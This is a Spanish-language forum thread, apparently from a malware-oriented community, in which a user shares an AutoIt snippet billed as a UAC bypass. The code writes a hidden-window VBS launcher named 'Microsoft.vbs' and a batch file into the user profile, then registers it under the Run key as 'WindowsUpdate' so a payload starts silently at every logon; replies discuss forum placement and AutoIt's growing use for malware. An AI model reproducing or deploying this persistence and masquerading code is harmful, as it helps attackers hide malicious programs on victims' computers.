Mostrar mensajes previos
Ordenar por
por - Pk2 - Esquizofrénico
Obviamente esto no debe ir acá... pero algun Moderador lo editará y llevará a su lugar correspondiente.

Lo mio es solo data.... Y esto es informacion "fresquita" (2 dias)....
Encontré en la web un "paper" de como pasar la UAC con [Enlace externo eliminado para invitados] (autor legend90)
if not FileExists(@UserProfileDir & "\data\Microsoft.vbs") then
Local $bat = FileOpen(@UserProfileDir & "\data\" & "start.cmd", 1)
FileWrite($bat, "@echo off" & @CRLF & "cd " & @UserProfileDir & "\data\" & @CRLF & "start " & @UserProfileDir & "\data\" & 'AutoIt3.exe "done.txt"')
FileClose($bat)
Local $vbs = FileOpen(@UserProfileDir & "\data\Microsoft.vbs", 1)
FileWrite($vbs, 'const Hidden = 0' & @CRLF & 'const WaitOnReturn = true' & @CRLF & 'File ="""' & @UserProfileDir & "\data\" & 'start.cmd"""' & @CRLF & 'set WshShell = CreateObject("WScript.Shell")' & @CRLF & 'WshShell.Run file, Hidden, WaitOnReturn' & @CRLF & 'wscript.quit')
FileClose($vbs)
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", "WindowsUpdate", "REG_SZ", @UserProfileDir & "\data\Microsoft.vbs")
Else
EndIf
Fuente:blackscripts.net

Espero nuestros coders sepan entender esto y eventualmente si es verdad que hace lo que dice nos beneficiemos todos con esto....

Imagen
por KHC Usa camisa de fuerza
No entiendo por que no lo pones en su zona correspondiente?
Buena info, gracias por traerla! :)
1337 & culture!
por Scorpio Moderador
Fresquita?...
>>> Started by legend90, Oct 13 2012 07:57 PM

Este metodo personalmente no me gusta nada, de todas formas, gracias por traerlo, ha alguien le sera util.
porqueeee....... exactamente no se cual es su zona....
Índice general » Taller » Desarrollo y Dudas de Programación » Otros lenguajes » Fuentes
Ikarus: Backdoor.VBS.SafeLoader
Agnitum: Trojan.VBS.Safebot.A
http://indeseables.github.io/
por - Pk2 - Esquizofrénico
xXSCORPIOXx escribió:Índice general » Taller » Desarrollo y Dudas de Programación » Otros lenguajes » Fuentes
Viste?!! era dificil....
Imagen
por Scorpio Moderador
- Pk2 - escribió:
xXSCORPIOXx escribió:Índice general » Taller » Desarrollo y Dudas de Programación » Otros lenguajes » Fuentes
Viste?!! era dificil....
Pues la verdad es que se deberia crear una seccion para AutoIt, ya que la gente se esta interesando por el para su uso en el malware, pero la mayoria de la documentacion esta en Ingles o Portugues, y ya que somos Indetectables, pues a innovar!
Ikarus: Backdoor.VBS.SafeLoader
Agnitum: Trojan.VBS.Safebot.A
http://indeseables.github.io/
Temas similares
How to hide files in NTFS por xrahitel en Manuales y Tutoriales
Cmd Hijack - a command/argument por xrahitel en Manuales y Tutoriales
Variantes de tema
Responder

Volver a “Fuentes”